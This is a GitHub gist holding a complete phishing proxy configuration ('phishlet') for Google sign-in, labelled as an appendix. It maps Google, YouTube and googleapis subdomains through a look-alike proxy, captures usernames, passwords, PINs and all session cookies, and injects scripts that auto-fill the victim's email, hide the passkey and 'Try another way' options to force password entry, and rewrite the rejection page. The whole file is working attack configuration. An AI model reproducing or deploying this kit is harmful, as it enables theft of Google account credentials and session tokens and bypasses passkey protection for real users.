Skip to content

Instantly share code, notes, and snippets.

@resource-not-found

resource-not-found/google.yaml Secret

Created May 9, 2024 06:48
Show Gist options
  • Save resource-not-found/664ed92b5aa086e7f7fce3d48cb77352 to your computer and use it in GitHub Desktop.
Save resource-not-found/664ed92b5aa086e7f7fce3d48cb77352 to your computer and use it in GitHub Desktop.
Download ZIP
Appendix 1: Google Auth Phishlet
Raw
google.yaml
min_ver: '3.0.0'
redirect_url: 'https://www.[ORIGIN_DOMAIN].com/'
proxy_hosts:
- {phish_sub: 'training', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.ru', session: false, is_landing: false}
- {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'chat', orig_sub: 'chat', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'lh3', orig_sub: 'lh3', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'www', orig_sub: 'www', domain: 'gstatic.com', session: false, is_landing: false}
- {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false}
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false}
- {phish_sub: 'signaler-pa', orig_sub: 'signaler-pa', domain: 'googleapis.com', session: false, is_landing: false}
- {phish_sub: 'ajax', orig_sub: 'ajax', domain: 'googleapis.com', session: false, is_landing: false}
auth_tokens:
- domain: '.google.com'
keys: [".*,regexp"]
- domain: 'accounts.google.com'
keys: [".*,regexp"]
credentials:
username:
key: 'identifier'
search: '(.*)'
type: 'post'
password:
key: 'Passwd'
search: '(.*)'
type: 'post'
custom:
- key: 'Pin'
search: '(.*)'
type: 'post'
auth_urls:
- '/CheckCookie'
- '/RotateCookies'
login:
domain: 'google.com'
path: '/v3/signin/identifier?flowName=WebLiteSignIn'
js_inject:
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/identifier"]
trigger_params: ["email"]
script: |
document.body.style.display = 'none';
function lp(){
document.querySelector('#identifierNext').click();
}
var email = document.querySelector('#identifierId');
if (email != null) {
email.value = '{email}';
setTimeout(function(){lp();}, 3000);
} else {
document.body.style.display = '';
}
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/challenge/pwd"]
script: |
document.body.style.display = 'none';
var paragraphs = Array.from(document.querySelectorAll('p'));
var targetParagraph = paragraphs.find(p =>
p.textContent.includes('Select "Try another way" to use') ||
p.textContent.includes('Чтобы использовать ключ доступа')
);
if (targetParagraph) {
var targetSection = targetParagraph.parentElement.parentElement.parentElement;
if (targetSection) {
targetSection.hidden = true;
}
}
var buttons = document.querySelectorAll('button');
buttons.forEach(button => {
if (button.textContent.trim() === 'Try another way' || button.textContent.trim() === 'Другой способ') {
button.textContent = '';
}
});
document.body.style.display = '';
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/challenge/pk/presend"]
script: |
document.body.style.display = 'none';
var buttons = document.querySelectorAll('button');
buttons.forEach(button => {
if (button.textContent.trim() === 'Try another way' || button.textContent.trim() === 'Другой способ') {
button.click();
}
});
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/challenge/selection"]
script: |
document.body.style.display = 'none';
var spans = document.querySelectorAll('span');
spans.forEach(span => {
if (span.textContent.trim() === 'Enter your password' || span.textContent.trim() === 'Введите пароль') {
document.body.style.display = 'none';
span.parentElement.parentElement.click();
}
if (span.textContent.trim() === 'Use your passkey' || span.textContent.trim() === 'Использовать ключ доступа') {
console.log(span);
span.parentElement.parentElement.parentElement.parentElement.hidden = true;
}
});
document.body.style.display = '';
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/rejected"]
script: |
document.body.style.display = 'none';
var paragraphs = Array.from(document.querySelectorAll('p'));
var targetParagraph1 = paragraphs.find(p =>
p.textContent.includes('Contact your domain admin for help')
);
if (targetParagraph1) {
targetParagraph1.innerHTML = 'Use this link to change your password: <a href="https://myaccount.google.com/u/1/signinoptions/password">Change Password</a><br>or contact your domain admin for help: <a href="mailto:administrator@[ORIGIN_DOMAIN].org">Send Email</a>';
}
var targetParagraph2 = paragraphs.find(p =>
p.textContent.includes('Обратитесь за помощью к администратору домена')
);
if (targetParagraph2) {
targetParagraph2.innerHTML = 'Используйте эту ссылку для восстановления пароля: <a href="https://myaccount.google.com/u/1/signinoptions/password">Изменить пароль</a><br>или обратитесь за помощью к администратору домена: <a href="mailto:administrator@[ORIGIN_DOMAIN].org">Написать письмо</a>';
}
document.body.style.display = '';
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment